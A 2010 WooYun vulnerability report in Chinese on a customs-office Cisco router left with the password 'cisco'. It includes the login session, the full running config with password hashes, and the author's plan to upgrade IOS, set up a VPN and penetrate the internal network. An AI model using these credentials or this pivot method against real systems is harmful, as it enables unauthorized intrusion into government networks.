漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-0246
漏洞标题:某海关多级路由器弱口令
相关厂商:某海关
漏洞作者: 路人甲
提交时间:2010-08-21 16:22
修复时间:2010-08-23 21:53
公开时间:2010-08-23 21:53
漏洞类型:基础设施弱口令
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-08-23: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
可对其ios进行升级,之后配置VPN,成功入侵内网.
详细说明:
设备IP地址:218.85.xx.xx
User Access Verification
Password:
Password:
JY-Haiguan>
JY-Haiguan>
JY-Haiguan>en
Password:
JY-Haiguan#sh run
Building configuration...
Current configuration : 1130 bytes
!
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname JY-Haiguan
!
boot-start-marker
boot-end-marker
!
enable secret 5 $1$JEYw$lIZhB3ferYKGuCC835ugm1
!
no aaa new-model
!
resource policy
!
ip subnet-zero
!
!
ip cef
no ip dhcp use vrf connected
ip dhcp excluded-address 192.168.1.254
ip dhcp excluded-address 192.168.1.252
ip dhcp excluded-address 192.168.1.253
!
ip dhcp pool jiangyin-haiguan
network 192.168.1.0 255.255.255.0
default-router 192.168.1.254
dns-server 202.101.xx.xx
!
!
ip name-server 202.101.xx.xx
!
!
!
!
interface FastEthernet0/0
ip address 218.85.xx.xx 255.255.255.128
ip nat outside
duplex auto
speed auto
!
interface FastEthernet0/1
ip address 192.168.1.254 255.255.255.0
ip nat inside
duplex auto
speed auto
!
ip classless
ip route 0.0.0.0 0.0.0.0 218.85.xx.1
!
ip http server
ip nat inside source list 10 interface FastEthernet0/0 overload
!
access-list 10 permit 192.168.1.0 0.0.0.255
!
control-plane
!
!
line con 0
line aux 0
line vty 0 4
password 7 00071A150754
login
!
scheduler allocate 20000 1000
!
end
JY-Haiguan#
25位的子网掩码,128个公网IP,虽然不在核心拓扑中,但我随意尝试了下,上下级的设备也都是弱口令,让我不禁感慨....cisco这个深入人心的弱口令再次发挥了强大的作用.
该版本的IOS不支持VPN,要对其版本进行升级,之后配置会保留,但设备会重启,重启后便可以通过VPN接入其内网进行渗透.
我查了下,应该是福建江阴海关的路由,只是供一小段网络做NAT用的.但通过其入侵整个拓扑还是比较容易的.
漏洞证明:
218.85.xx.xx
password:cisco
修复方案:
增强口令复杂程度.
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:6 (WooYun评价)